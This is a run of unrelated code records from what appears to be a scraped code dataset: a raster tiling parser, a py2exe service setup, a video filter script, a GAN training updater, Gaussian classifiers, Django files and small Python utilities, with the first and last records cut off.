the Raster Layer into the\n RasterTile table.\n \"\"\"\n try:\n # Clean previous parse log\n self.log(\n 'Started parsing raster file',\n reset=True,\n status=self.rasterlayer.parsestatus.DOWNLOADING_FILE\n )\n\n # Download, unzip and open raster file\n self.get_raster_file()\n self.open_raster_file()\n\n # Remove existing tiles for this layer before loading new ones\n self.rasterlayer.rastertile_set.all().delete()\n\n # Transform raster to global srid\n if self.dataset.srs.srid == WEB_MERCATOR_SRID:\n self.log('Dataset already in SRID {0}, skipping transform'.format(WEB_MERCATOR_SRID))\n else:\n self.log(\n 'Transforming raster to SRID {0}'.format(WEB_MERCATOR_SRID),\n status=self.rasterlayer.parsestatus.REPROJECTING_RASTER\n )\n self.dataset = self.dataset.transform(WEB_MERCATOR_SRID)\n\n # Compute max zoom at the web mercator projection\n self.max_zoom = tiler.closest_zoomlevel(\n abs(self.dataset.scale.x)\n )\n\n # Store max zoom level in metadata\n self.rasterlayer.metadata.max_zoom = self.max_zoom\n self.rasterlayer.metadata.save()\n\n # Reduce max zoom by one if zoomdown flag was disabled\n if not self.zoomdown:\n self.max_zoom -= 1\n\n self.log(\n 'Started creating tiles',\n status=self.rasterlayer.parsestatus.CREATING_TILES\n )\n\n # Loop through all lower zoom levels and create tiles to\n # setup TMS aligned tiles in world mercator\n for iz in range(self.max_zoom + 1):\n self.create_tiles(iz)\n\n self.drop_empty_rasters()\n\n # Send signal for end of parsing\n rasterlayers_parser_ended.send(sender=self.rasterlayer.__class__, instance=self.rasterlayer)\n\n # Log success of parsing\n self.log(\n 'Successfully finished parsing raster',\n status=self.rasterlayer.parsestatus.FINISHED\n )\n except:\n self.log(\n traceback.format_exc(),\n status=self.rasterlayer.parsestatus.FAILED\n )\n raise\n finally:\n self.close_raster_file()\n shutil.rmtree(self.tmpdir)\n","sub_path":"raster/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":12587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"262347046","text":"from distutils.core import setup\r\nimport py2exe\r\nfrom glob import glob\r\nimport django\r\nimport os\r\n\r\nclass Target:\r\n def __init__(self, **kw):\r\n self.__dict__.update(kw)\r\n # for the versioninfo resources\r\n self.version = \"1.0.0.0\"\r\n self.company_name = \"Estudio 89\"\r\n self.copyright = \"Copyright (c) 2015 Estudio 89.\"\r\n self.name = \"EngageService\"\r\n\r\n\r\ndef find_django_modules(exclude=[]):\r\n modules = []\r\n django_path = django.__path__[0]\r\n generator = os.walk(django.__path__[0])\r\n generator.next()\r\n for root, dirs, files in generator:\r\n if files.count(\"__init__.py\"):\r\n for f in files:\r\n if f.endswith(\".py\") and f != \"__init__.py\":\r\n full_path = root + \"\\\\\" + f\r\n mod = full_path.replace(django_path + \"\\\\\",\"\")\r\n mod = mod.replace(\".py\",\"\")\r\n mod = \"django.\" + mod.replace(\"\\\\\",\".\")\r\n if not any([ex in mod for ex in exclude]):\r\n modules.append(mod)\r\n return modules\r\nmyservice = Target(modules=['EngageService'],\r\n cmdline_style='custom',\r\n description=\"Engage middleware\")\r\n\r\npy2exe_options = {'py2exe':{\r\n \"packages\":[\"engage_middleware\",\"sqlite3\",\"authenticator\",\"synchronizer\"],\r\n 'includes':[\r\n \"django\",\r\n \"email\",\r\n \"encodings\",\r\n \"engage_middleware\",\r\n \"engage_middleware.settings\",\r\n\r\n \"Crypto\",\r\n \"e89_security\",\r\n \"htmlentitydefs\",\r\n \"HTMLParser\",\r\n ],\r\n 'excludes':[\r\n 'django.conf.project_template',\r\n 'Tkinter',\r\n 'tk',\r\n 'ttk',\r\n 'tcl'\r\n ]\r\n }\r\n}\r\n\r\npy2exe_options[\"py2exe\"][\"includes\"] += find_django_modules(exclude=[\"django.test\",\"django.conf.project_template\"])\r\ndata_files = [(\"Microsoft.VC90.CRT\", glob(r'C:\\Users\\luccascorrea\\engage-middleware\\dlls\\*.*'))]\r\n\r\n\r\nsetup(\r\n\t\tdata_files=data_files,\r\n service = [myservice],\r\n options=py2exe_options)\r\n","sub_path":"setup_service.py","file_name":"setup_service.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"177309492","text":"from __future__ import annotations\n\nfrom typing import Any, Dict, Tuple\n\nimport vapoursynth as vs\nimport vsencode as vse\nfrom vardefunc import initialise_input\n\nfrom project_module import flt\n\nini = vse.generate.init_project()\n\ncore = vse.util.get_vs_core(reserve_core=ini.reserve_core)\n\nshader = vse.get_shader(\"FSRCNNX_x2_56-16-4-1.glsl\")\n\n\n# Sources\nSRC = vse.FileInfo(f\"{ini.bdmv_dir}/The Girl from the Other Side.mkv\", (24, -24))\n\n\nzones: Dict[Tuple[int, int], Dict[str, Any]] = { # Zones for the encoder\n}\n\n\n@initialise_input()\ndef filterchain(src: vs.VideoNode = SRC.clip_cut) -> vs.VideoNode | Tuple[vs.VideoNode, ...]:\n \"\"\"Main filterchain\"\"\"\n import havsfunc as haf\n import jvsfunc as jvf\n import vardefunc as vdf\n from vsmask.edge import FDOG\n from vsutil import get_y, insert_clip\n\n assert src.format\n\n smd = haf.SMDegrain(src, tr=3, thSAD=110, blksize=16)\n\n ret_smd = core.retinex.MSRCP(get_y(smd), sigma=[50, 200, 350], upper_thr=0.005)\n l_mask = FDOG().get_mask(ret_smd, lthr=102 << 8, hthr=102 << 8).std.Maximum().std.Minimum().std.Minimum()\n l_mask = l_mask.std.Minimum().std.Median().std.Convolution([1] * 9) # stolen from varde xd\n\n ccd_uv = jvf.ccd(smd, threshold=12)\n ccd_uv = core.std.MaskedMerge(ccd_uv, smd, l_mask)\n\n # Slight cleaning fun stuff\n credit = core.std.Binarize(get_y(src[100506])).std.Convolution([1] * 9)\n dft = core.dfttest.DFTTest(src, sigma=50)\n\n final_credit = ccd_uv[100465:]\n final_credit = core.std.MaskedMerge(final_credit, dft[100465:], credit)\n final_credit = insert_clip(ccd_uv, final_credit, 100465)\n\n deband = flt.masked_f3kdb(final_credit, rad=16, thr=[12, 6], grain=[32, 0])\n\n decs = vdf.noise.decsiz(deband, min_in=208 << 8, max_in=240 << 8)\n\n return decs\n\n\nFILTERED = filterchain()\n\n\nif __name__ == '__main__':\n vse.EncodeRunner(SRC, FILTERED).video('x264', '.settings/x264_settings', zones=zones) \\\n .audio('aac', all_tracks=True).mux('LightArrowsEXE@Kaleido').run()\nelif __name__ == '__vapoursynth__':\n if not isinstance(FILTERED, vs.VideoNode):\n raise vs.Error(f\"Input clip has multiple output nodes ({len(FILTERED)})! Please output a single clip\")\n else:\n vse.video.finalize_clip(FILTERED).set_output(0)\nelse:\n SRC.clip_cut.set_output(0)\n\n if not isinstance(FILTERED, vs.VideoNode):\n for i, clip_filtered in enumerate(FILTERED, start=1):\n clip_filtered.set_output(i)\n else:\n FILTERED.set_output(1)\n\n for i, audio_node in enumerate(SRC.audios_cut, start=10):\n audio_node.set_output(i)\n","sub_path":"[Kaleido-subs]/Movies & OVAs/Totsukuni no Shoujo (2022) [BD]/Totsukuni2022BD_01.py","file_name":"Totsukuni2022BD_01.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"158535887","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright (c) 2017 Yasunori Kudo\n\nfrom __future__ import print_function\n\nimport chainer\nimport chainer.functions as F\nfrom chainer import cuda\nfrom chainer import Variable\n\nimport numpy as np\n\n\nclass Updater(chainer.training.StandardUpdater):\n def __init__(self, dcgan_accuracy_cap, *args, use_heuristic_loss, heuristic_loss_weight: float, **kwargs):\n self.heuristic_loss_weight = heuristic_loss_weight\n self.use_heuristic_loss = use_heuristic_loss\n self.dcgan_accuracy_cap = dcgan_accuracy_cap\n self.mode = kwargs.pop('mode')\n self.batch_statistics = kwargs.pop('batch_statistics')\n if not self.mode in ['dcgan', 'wgan', 'supervised']:\n raise ValueError\n self.gen, self.dis = kwargs.pop('models')\n super(Updater, self).__init__(*args, **kwargs)\n\n @staticmethod\n def calculate_rotation(xy_real: chainer.Variable, z_pred: chainer.Variable) -> chainer.Variable:\n xy_split = chainer.functions.split_axis(xy_real, xy_real.data.shape[3], axis=3)\n z_split = chainer.functions.split_axis(z_pred, z_pred.data.shape[3], axis=3)\n\n # 首から鼻へのzx平面上のベクトル(a0, b0)\n a0 = z_split[9] - z_split[8]\n b0 = xy_split[9 * 2] - xy_split[8 * 2]\n n0 = chainer.functions.sqrt(a0 * a0 + b0 * b0)\n # 右肩から左肩へのzx平面上のベクトル(a1, b1)\n a1 = z_split[14] - z_split[11]\n b1 = xy_split[14 * 2] - xy_split[11 * 2]\n n1 = chainer.functions.sqrt(a1 * a1 + b1 * b1)\n # 肩とのなす角\n return (a0 * b1 - a1 * b0) / (n0 * n1)\n\n @staticmethod\n def calculate_heuristic_loss(xy_real: chainer.Variable, z_pred: chainer.Variable) -> chainer.Variable:\n return chainer.functions.average(\n chainer.functions.relu(- Updater.calculate_rotation(xy_real, z_pred))\n )\n\n def update_core(self):\n gen_optimizer = self.get_optimizer('gen')\n dis_optimizer = self.get_optimizer('dis')\n\n gen, dis = self.gen, self.dis\n\n batch = self.get_iterator('main').next()\n batchsize = len(batch)\n xy, xyz, scale = chainer.dataset.concat_examples(batch, self.device)\n\n xy_real = Variable(xy)\n z_pred = gen(xy_real)\n\n # Random rotation.\n theta = np.random.uniform(0, 2 * np.pi, len(xy)).astype(np.float32)\n cos_theta = np.broadcast_to(np.cos(theta), z_pred.shape[::-1])\n cos_theta = Variable(self.gen.xp.array(cos_theta.transpose(3, 2, 1, 0)))\n sin_theta = np.broadcast_to(np.sin(theta), z_pred.shape[::-1])\n sin_theta = Variable(self.gen.xp.array(sin_theta.transpose(3, 2, 1, 0)))\n\n # 2D Projection.\n x = xy_real[:, :, :, 0::2]\n y = xy_real[:, :, :, 1::2]\n xx = x * cos_theta + z_pred * sin_theta\n xx = xx[:, :, :, :, None]\n yy = y[:, :, :, :, None]\n xy_fake = F.concat((xx, yy), axis=4)\n xy_fake = F.reshape(xy_fake, (*y.shape[:3], -1))\n\n if self.batch_statistics:\n xy_real = concat_stat(xy_real)\n xy_fake = concat_stat(xy_fake)\n\n y_real = dis(xy_real)\n y_fake = dis(xy_fake)\n mse = F.mean_squared_error(z_pred, xyz[:, :, :, 2::3])\n\n if self.mode == 'supervised':\n gen.cleargrads()\n mse.backward()\n gen_optimizer.update()\n chainer.report({'mse': mse}, gen)\n\n elif self.mode == 'dcgan':\n acc_dis_fake = F.binary_accuracy(y_fake, dis.xp.zeros(y_fake.data.shape, dtype=int))\n acc_dis_real = F.binary_accuracy(y_real, dis.xp.ones(y_real.data.shape, dtype=int))\n acc_dis = (acc_dis_fake + acc_dis_real) / 2\n\n loss_gen = F.sum(F.softplus(-y_fake)) / batchsize\n if self.use_heuristic_loss:\n loss_heuristic = self.calculate_heuristic_loss(xy_real=xy_real, z_pred=z_pred)\n loss_gen += loss_heuristic * self.heuristic_loss_weight\n chainer.report({'loss_heuristic': loss_heuristic}, gen)\n gen.cleargrads()\n if acc_dis.data >= (1 - self.dcgan_accuracy_cap):\n loss_gen.backward()\n gen_optimizer.update()\n xy_fake.unchain_backward()\n\n loss_dis = F.sum(F.softplus(-y_real)) / batchsize\n loss_dis += F.sum(F.softplus(y_fake)) / batchsize\n dis.cleargrads()\n if acc_dis.data <= self.dcgan_accuracy_cap:\n loss_dis.backward()\n dis_optimizer.update()\n\n chainer.report({'loss': loss_gen, 'mse': mse}, gen)\n chainer.report({'loss': loss_dis, 'acc': acc_dis, 'acc/fake': acc_dis_fake, 'acc/real': acc_dis_real}, dis)\n\n elif self.mode == 'wgan':\n y_real = F.sum(y_real) / batchsize\n y_fake = F.sum(y_fake) / batchsize\n\n wasserstein_distance = y_real - y_fake\n loss_dis = -wasserstein_distance\n loss_gen = -y_fake\n if self.use_heuristic_loss:\n loss_heuristic = self.calculate_heuristic_loss(xy_real=xy_real, z_pred=z_pred)\n loss_gen += loss_heuristic * self.heuristic_loss_weight\n chainer.report({'loss_heuristic': loss_heuristic}, gen)\n\n dis.cleargrads()\n loss_dis.backward()\n dis_optimizer.update()\n\n if self.iteration < 2500 and self.iteration % 100 == 0:\n gen.cleargrads()\n loss_gen.backward()\n gen_optimizer.update()\n\n if self.iteration > 2500 and self.iteration % 5 == 0:\n gen.cleargrads()\n loss_gen.backward()\n gen_optimizer.update()\n\n chainer.report({'loss': loss_gen, 'mse': mse}, gen)\n chainer.report({'loss': loss_dis}, dis)\n\n else:\n raise NotImplementedError\n\n\ndef concat_stat(x):\n mean = F.mean(x, axis=0)\n mean = F.concat([mean[None]] * x.shape[0], axis=0)\n variance = F.broadcast_to(F.mean((x - mean) * (x - mean)), x.shape)\n return F.concat((x, variance), axis=1)\n","sub_path":"projection_gan/pose/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"269882524","text":"import json\nimport logging\nimport os\nimport sys\nfrom logging import config\n\n\ndef configure_logging(path):\n if path and os.path.exists(path):\n with open(path, 'r') as c:\n config_json = json.load(c)\n config.dictConfig(config_json)\n else:\n logging.basicConfig(format='%(asctime)s %(name)s %(levelname)s %(message)s',\n stream=sys.stdout,\n level=logging.DEBUG)\n # set pyspark logger output to ERROR to keep python logs clean\n pyspark_log = logging.getLogger('py4j')\n pyspark_log.setLevel(logging.WARN)\n\n\nclass MissingDataWarning(Warning):\n \"\"\"Raise for the case in which output was produced but there was no data (all empty) for one of the days processed\"\"\"\n\nclass NoOutputException(Exception):\n \"\"\"Raise for the case in which no output was produced because of no data for all days processed\"\"\"\n\nclass DataScienceWarning(Warning):\n \"\"\"Raise for non-fatal errors that generate suspicious results\"\"\"","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"332962534","text":"from util.separator import separator_content\nimport sys\n\nif __name__ == \"__main__\":\n \"\"\"\n 问题\n 你在代码中使用 while 循环来迭代处理数据,因为它需要调用某个函数或者和一般迭代模式不同的测试条件。 \n \n 能不能用迭代器来重写这个循环呢?\n\n 解决方案\n 一个常见的IO操作程序可能会想下面这样:\n \"\"\"\n separator_content()\n CHUNK_SIZE = 8192\n\n def process_data(data):\n pass\n\n\n def reader(s):\n while True:\n data = s.recv(CHUNK_SIZE)\n if data == b'':\n break\n process_data(data)\n\n \"\"\"\n 这种代码通常可以使用 iter() 来代替 \n \"\"\"\n\n def reader2(s):\n for chunk in iter(lambda: s.read(10), ''):\n print(chunk)\n # process_data(data)\n\n\n \"\"\"\n iter 函数一个鲜为人知的特性是它接受一个可选的 callable 对象和一个标记(结尾)值作为输入参数。 \n 当以这种方式使用的时候,它会创建一个迭代器, 这个迭代器会不断调用 callable 对象直到返回值和标记值相等为止。\n\n 这种特殊的方法对于一些特定的会被重复调用的函数很有效果,比如涉及到I/O调用的函数。 \n 举例来讲,如果你想从套接字或文件中以数据块的方式读取数据,通常你得要不断重复的执行 read() 或 recv() , \n 并在后面紧跟一个文件结尾测试来决定是否终止。这节中的方案使用一个简单的 iter() 调用就可以将两者结合起来了。 \n \n 其中 lambda 函数参数是为了创建一个无参的 callable 对象,并为 recv 或 read() 方法提供了 size 参数。\n \"\"\"\n separator_content()\n s = sys.argv[0]\n with open(s,\n encoding=\"utf-8\") as input_file:\n reader2(input_file)\n","sub_path":"4__Iterators and generators/__16__Iterator instead of while infinite loop.py","file_name":"__16__Iterator instead of while infinite loop.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"332024875","text":"infile = \"C:\\\\Users\\\\Justyna\\\\Desktop\\\\Documents\\\\text_files\\\\computer\\\\Abacus.txt\"\noutfile = \"C:\\\\Users\\\\Justyna\\\\Desktop\\\\Documents\\\\text_files\\\\computer\\\\Abacus_swap.txt\"\n\nreplace_list = {\"use \": \"non \", \"the \" : \"some \", \"of \": \"any \"}\nfin = open(infile)\nfout = open(outfile, \"w+\")\nfor line in fin:\n for word in replace_list:\n line = line.replace(word, replace_list.get(word))\n fout.write(line)\nfin.close()\nfout.close()","sub_path":"PythonI/zad10.py","file_name":"zad10.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"40084595","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('letters', '0007_auto_20150215_1626'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='lettertext',\n name='addressee_is_organisation',\n field=models.BooleanField(default=False),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='lettertext',\n name='addressee_is_representative',\n field=models.BooleanField(default=False),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='lettertext',\n name='letter_title',\n field=models.CharField(blank=True, null=True, max_length=100),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='lettertext',\n name='sender_name',\n field=models.CharField(default='Sender', max_length=100),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='lettertext',\n name='sender_title',\n field=models.CharField(default='Letter sender', max_length=100),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='contenttemplate',\n name='created',\n field=models.DateTimeField(auto_now_add=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='contenttemplate',\n name='end_time',\n field=models.DateTimeField(auto_now_add=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='contenttemplate',\n name='start_time',\n field=models.DateTimeField(auto_now_add=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='lettertext',\n name='date_sent',\n field=models.DateTimeField(auto_now_add=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"api/correspondence/letters/migrations/0008_auto_20150215_1732.py","file_name":"0008_auto_20150215_1732.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"93842915","text":"from django.urls import path\r\nfrom . import views\r\n\r\napp_name = 'shop'\r\n\r\nurlpatterns=[\r\n path('arhives//', views.archives_year, name='archive_year'),\r\n path('/', views.item_detail, name='item_detail'),\r\n path('', views.item_list, name='item_list'),\r\n path('new/', views.item_new, name='item_new'),\r\n]","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"395900981","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 13 15:10:43 2021\n\n\"\"\"\n\nimport numpy\nimport scipy\nfrom scipy import special\n\n\ndef getMu(D):\n mu = []\n for i in range(D.shape[0]):\n mui = (1/(D[i].size))*sum(D[i])\n mu.append(mui)\n return mu\n\ndef colvec(vec):\n return vec.reshape(vec.size,1)\n\ndef getSigma(D,mu):\n mu = colvec(mu)\n C=0\n for i in range (D.shape[1]):\n C=C+numpy.dot(D[:,i:i+1]-mu,(D[:,i:i+1] - mu ).T)\n\n C= C/float(D.shape[1])\n return C\n\ndef getSigmaI(D,mu):\n mu = colvec(mu)\n C=0\n for i in range (D.shape[1]):\n C=C+numpy.dot(D[:,i:i+1]-mu,(D[:,i:i+1] - mu ).T)\n\n C= numpy.multiply(C/float(D.shape[1]),numpy.identity(D.shape[0]))\n return C\n\ndef logpdf_GAU_ND(x, mu, C):\n x=colvec(x)\n lastTerm = 0.5*(numpy.dot(numpy.dot(((x-mu).T),(numpy.linalg.inv(C))),(x-mu)))\n det = numpy.linalg.slogdet(C)\n det = numpy.log(abs(det[1]))\n #ricalcolo determinante \n det = numpy.log(numpy.linalg.det(C))\n m=x.size\n return (-m*0.5*numpy.log(numpy.pi*2)) - (0.5*det) - lastTerm\n\n\n\ndef MVG_classifier(DTR,LTR,DTE, LTE):\n D0 = DTR[:, LTR==0]\n D1 = DTR[:, LTR==1]\n # D2 = DTR[:, LTR==2]\n \n mu0 = colvec(numpy.matrix(getMu(D0)))\n mu1 = colvec(numpy.matrix(getMu(D1)))\n #mu2 = colvec(numpy.matrix(getMu(D2)))\n \n sigma0 = getSigma(D0,mu0)\n sigma1 = getSigma(D1,mu1)\n #sigma2 = getSigma(D2,mu2)\n \n m_c = []\n s_c = []\n \n m_c.append(mu0)\n m_c.append(mu1)\n #m_c.append(mu2)\n s_c.append(sigma0)\n s_c.append(sigma1)\n #s_c.append(sigma2)\n \n S = numpy.zeros((2, DTE.shape[1]))\n \n for i in range(2):\n for j, sample in enumerate(DTE.T):\n S[i, j] = numpy.exp(logpdf_GAU_ND(sample, m_c[i], s_c[i]))\n \n SJoint = 1/2*S\n SSum = SJoint.sum(axis=0)\n SPost = SJoint/SSum\n \n Predictions = SPost.argmax(axis=0) == LTE\n Predicted = Predictions.sum()\n NotPredicted = Predictions.size - Predicted\n acc = Predicted/Predictions.size\n return Predicted, DTE.shape[1]\n\ndef MVG_log(DTR,LTR,DTE, LTE):\n D0 = DTR[:, LTR==0]\n D1 = DTR[:, LTR==1]\n # D2 = DTR[:, LTR==2]\n \n mu0 = colvec(numpy.matrix(getMu(D0)))\n mu1 = colvec(numpy.matrix(getMu(D1)))\n #mu2 = colvec(numpy.matrix(getMu(D2)))\n \n sigma0 = getSigma(D0,mu0)\n sigma1 = getSigma(D1,mu1)\n #sigma2 = getSigma(D2,mu2)\n \n m_c = []\n s_c = []\n \n m_c.append(mu0)\n m_c.append(mu1)\n #m_c.append(mu2)\n s_c.append(sigma0)\n s_c.append(sigma1)\n #s_c.append(sigma2)\n\n S = numpy.zeros((2, DTE.shape[1]))\n\n for i in range(2):\n for j, sample in enumerate(DTE.T):\n S[i, j] = logpdf_GAU_ND(sample, m_c[i], s_c[i])\n\n SJoint = numpy.log(1/2) + S\n SSum = special.logsumexp(SJoint, axis=0)\n SPost = SJoint - SSum\n\n Predictions = SPost.argmax(axis=0) == LTE\n Predicted = Predictions.sum()\n NotPredicted = Predictions.size - Predicted\n acc = Predicted/Predictions.size\n\n return Predicted, DTE.shape[1]\n\ndef NaiveBayesGaussianClassifier(DTR, LTR, DTE, LTE):\n D0 = DTR[:, LTR==0]\n D1 = DTR[:, LTR==1]\n #D2 = DTR[:, LTR==2]\n \n mu0 = colvec(numpy.matrix(getMu(D0)))\n mu1 = colvec(numpy.matrix(getMu(D1)))\n #mu2 = colvec(numpy.matrix(getMu(D2)))\n \n sigma0 = getSigmaI(D0,mu0)\n sigma1 = getSigmaI(D1,mu1)\n #sigma2 = getSigmaI(D2,mu2)\n \n m_c = []\n s_c = []\n \n m_c.append(mu0)\n m_c.append(mu1)\n # m_c.append(mu2)\n s_c.append(sigma0)\n s_c.append(sigma1)\n #s_c.append(sigma2)\n\n S = numpy.zeros((2, DTE.shape[1]))\n\n for i in range(2):\n for j, sample in enumerate(DTE.T):\n S[i, j] = logpdf_GAU_ND(sample, m_c[i], s_c[i])\n\n SJoint = numpy.log(1/2) + S\n SSum = special.logsumexp(SJoint, axis=0)\n SPost = SJoint - SSum\n\n Predictions = SPost.argmax(axis=0) == LTE\n Predicted = Predictions.sum()\n NotPredicted = Predictions.size - Predicted\n acc = Predicted/Predictions.size\n\n return Predicted, DTE.shape[1]\n\ndef TiedCovarianceGaussianClassifier(DTR, LTR, DTE, LTE):\n D0 = DTR[:, LTR==0]\n D1 = DTR[:, LTR==1]\n # D2 = DTR[:, LTR==2]\n \n mu0 = colvec(numpy.matrix(getMu(D0)))\n mu1 = colvec(numpy.matrix(getMu(D1)))\n # mu2 = colvec(numpy.matrix(getMu(D2)))\n \n sigma0 = getSigmaI(D0,mu0)\n sigma1 = getSigmaI(D1,mu1)\n # sigma2 = getSigmaI(D2,mu2)\n \n m_c = []\n \n m_c.append(mu0)\n m_c.append(mu1)\n # m_c.append(mu2)\n \n SStar = (sigma0*D0.shape[1]+sigma1*D1.shape[1])/DTR.shape[1]\n\n S = numpy.zeros((2, DTE.shape[1]))\n\n for i in range(2):\n for j, sample in enumerate(DTE.T):\n S[i, j] = logpdf_GAU_ND(sample, m_c[i], SStar)\n\n SJoint = numpy.log(1/2) + S\n SSum = scipy.special.logsumexp(SJoint, axis=0)\n SPost = SJoint - SSum\n\n Predictions = SPost.argmax(axis=0) == LTE\n Predicted = Predictions.sum()\n NotPredicted = Predictions.size - Predicted\n acc = Predicted/Predictions.size\n\n return Predicted, DTE.shape[1]\n\ndef KFoldValidation(D,L):\n fileResults = open('Resultsfile.txt','w')\n fileResults.writelines('k \\t mvg \\t naivebayes \\t tiedCov' '\\n')\n K = 8 \n # N = int(D.shape[1]/K)\n classifiers = [(MVG_log, \"Multivariate Gaussian Classifier\"),(NaiveBayesGaussianClassifier, \"Naive Bayes\"),(TiedCovarianceGaussianClassifier, \"Tied Covariance\")]\n\n N = int(D.shape[1]/K)\n fileResults.writelines(str(K)+ ' \\t ') \n\n for j, (c, cstring) in enumerate(classifiers):\n nWrongPrediction = 0\n numpy.random.seed(j)\n indexes = numpy.random.permutation(D.shape[1])\n for i in range(K):\n \n idxTest = indexes[i*N:(i+1)*N]\n \n if i > 0:\n idxTrainLeft = indexes[0:i*N]\n elif (i+1) < K:\n idxTrainRight = indexes[(i+1)*N:]\n \n if i == 0:\n idxTrain = idxTrainRight\n elif i == K-1:\n idxTrain = idxTrainLeft\n else:\n idxTrain = numpy.hstack([idxTrainLeft, idxTrainRight])\n \n DTR = D[:, idxTrain]\n LTR = L[idxTrain]\n DTE = D[:, idxTest]\n LTE = L[idxTest]\n nCorrectPrediction, nSamples = c(DTR,LTR, DTE, LTE)\n nWrongPrediction += nSamples - nCorrectPrediction\n\n\n errorRate = nWrongPrediction/D.shape[1]\n accuracy = 1 - errorRate\n fileResults.writelines(str(round(accuracy*100, 1)) + '\\t') \n\n\n print(f\"{cstring} results:\\nAccuracy: {round(accuracy*100, 1)}%\\nError rate: {round(errorRate*100, 1)}%\\n\") \n\n fileResults.close()\n\n# kfold for different models\ndef KFoldValidationGenerativeModels(D,L):\n K = 8 \n # N = int(D.shape[1]/K)\n fileResults = open('ResultsfileGenerativeModelPCA.txt','w')\n fileResults.writelines('partition \\t mvg \\t mvglog \\t naive \\t tied \\n')\n\n N = int(D.shape[1]/K) \n\n numpy.random.seed(0)\n indexes = numpy.random.permutation(D.shape[1])\n\n # stored ac0curacies\n mvgPrecList=[]\n mvgLogPrecList=[]\n NaivePrecList=[]\n tiedPrecList=[]\n\n for i in range(K):\n\n idxTest = indexes[i*N:(i+1)*N]\n\n if i > 0:\n idxTrainLeft = indexes[0:i*N]\n elif (i+1) < K:\n idxTrainRight = indexes[(i+1)*N:]\n\n if i == 0:\n idxTrain = idxTrainRight\n elif i == K-1:\n idxTrain = idxTrainLeft\n else:\n idxTrain = numpy.hstack([idxTrainLeft, idxTrainRight])\n \n DTR = D[:, idxTrain]\n LTR = L[idxTrain]\n DTE = D[:, idxTest]\n LTE = L[idxTest]\n\n predictedMVG,shapeMVG = MVG_classifier(DTR,LTR,DTE,LTE)\n mvgPrec=predictedMVG/shapeMVG*100\n mvgPrecList.append(mvgPrec)\n\n\n predictedMVGLog,shapeMVGLog = MVG_log(DTR,LTR,DTE,LTE)\n mvgLogPrec=predictedMVGLog/shapeMVGLog*100\n mvgLogPrecList.append(mvgLogPrec)\n\n\n predictedNaive,shapeNaive = NaiveBayesGaussianClassifier(DTR,LTR,DTE,LTE)\n NaivePrec=predictedNaive/shapeNaive*100\n NaivePrecList.append(NaivePrec)\n\n\n predictedTied,shapeTied = TiedCovarianceGaussianClassifier(DTR,LTR,DTE,LTE)\n tiedPrec=predictedTied/shapeTied*100\n tiedPrecList.append(tiedPrec)\n\n \n fileResults.writelines(str(K)+\" \\t \"+str(mvgPrec)+ \" \\t\" + str(mvgLogPrec) +\"\\t\"+ str(NaivePrec) +\" \\t \"+str(tiedPrec) + \"\\n\")\n \n # compute the mean\n fileResults.writelines(\"means \\t \" + str(numpy.mean(mvgPrecList))+\" \\t \"+ str(numpy.mean(mvgLogPrecList))+\" \\t \"+str(numpy.mean(NaivePrecList))+\" \\t \"+str(numpy.mean(tiedPrecList))+\" \\n \")\n fileResults.close()\n\n","sub_path":"GenerativeModels.py","file_name":"GenerativeModels.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"351571704","text":"import scipy as sp\nimport scipy.ndimage as spim\nfrom skimage.morphology import ball, disk, square, cube\nfrom array_split import shape_split\nfrom scipy.signal import fftconvolve\n\n\ndef align_image_with_openpnm(im):\n r\"\"\"\n Rotates an image to agree with the coordinates used in OpenPNM. It is\n unclear why they are not in agreement to start with. This is necessary\n for overlaying the image and the network in Paraview.\n\n Parameters\n ----------\n im : ND-array\n The image to be rotated. Can be the Boolean image of the pore space or\n any other image of interest.\n\n Returns\n -------\n Returns the image rotated accordingly.\n \"\"\"\n if im.ndim == 2:\n im = (sp.swapaxes(im, 1, 0))\n im = im[-1::-1, :]\n elif im.ndim == 3:\n im = (sp.swapaxes(im, 2, 0))\n im = im[:, -1::-1, :]\n return im\n\n\ndef fftmorphology(im, strel, mode='opening'):\n r\"\"\"\n Perform morphological operations on binary images using fft approach for\n improved performance\n\n Parameters\n ----------\n im : nd-array\n The binary image on which to perform the morphological operation\n\n strel : nd-array\n The structuring element to use. Must have the same dims as ``im``.\n\n mode : string\n The type of operation to perform. Options are 'dilation', 'erosion',\n 'opening' and 'closing'.\n\n 